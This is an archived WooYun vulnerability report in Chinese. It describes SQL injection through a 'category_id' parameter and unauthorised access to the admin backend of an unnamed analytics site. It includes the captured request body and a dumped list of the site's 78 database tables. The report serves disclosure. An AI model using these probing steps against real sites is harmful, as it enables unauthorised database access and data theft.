乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-29: 细节已通知厂商并且等待厂商处理中 2013-11-03: 厂商已经主动忽略漏洞,细节向公众公开
数据库好多信息的说
1.发现这样一个站点;
2.在login后面加了个单引号居然爆出了网站的目录,桑不起呀;
3.然后发现这个地址可以越权访问到后台,原来是酱紫的;
4.点击查询并抓包,得到如下数据;
csrfmiddlewaretoken=f47f57f0f6ff4f3ab494ade620263238&csrfmiddlewaretoken=f47f57f0f6ff4f3ab494ade620263238&start=2013-10-21&end=2013-10-28&category_id=8
5.随便在category_id参数后面加了单引号,我去,这信息太丰富了,我节选了一部分;
6.好吧,跑了下出来好多库;
7.再节选一张表信息;
Database: analyzedb[78 tables]+-------------------------------------+| active_ip || ad_category || ad_delivery_log || ad_relation || auth_group || auth_group_permissions || auth_message || auth_permission || auth_user || auth_user_groups || auth_user_user_permissions || brand_product_click_buy_count || category_editor_collect_count || category_editor_publish_count || cellphone || channel || channel_data || crawl_task || daily_brand_product_click_buy_count || daily_brand_pv_count || daily_category_count || daily_category_editor_collect_count || daily_category_editor_publish_count || daily_checkin_count || daily_editor_work_count || daily_event_click_buy || daily_forum_count || daily_invitation_count || daily_product_comment_count || daily_product_count || daily_product_discount_detail || daily_product_favor_count || daily_source_site_count || daily_user_count || daily_user_count_by_site || daily_user_login_count || daily_user_share_product || db_growth || delivery_data || delivery_tbk_log || django_admin_log || django_content_type || django_session || django_site || edm_html_template || guang_ST || guang_access_log || guang_channel_count || guang_group_log || guang_ip || guang_site_count || important_merchant || iplib || merchant_recommend_product || prestore_data || product_click_buy || product_comment_count || product_count || product_favor_count || redirect_stat || registration_registrationprofile || search_detail_log || search_detail_log_new || search_log || seller_user || taobao_buyer_trade_log || taobaoke_detail || task_detail || tbk_detail || tbk_detail_history || thirdpart_report || topic_pageview_log || unsubscription_mail || user_count || user_count_by_site || user_count_has_comment || user_count_has_favor || user_login_record |+-------------------------------------+
8.信息很丰富,我就不继续深入了;
见详细说明
你们懂的
危害等级:无影响厂商忽略
忽略时间:2013-11-03 09:29
2014-06-03:已关闭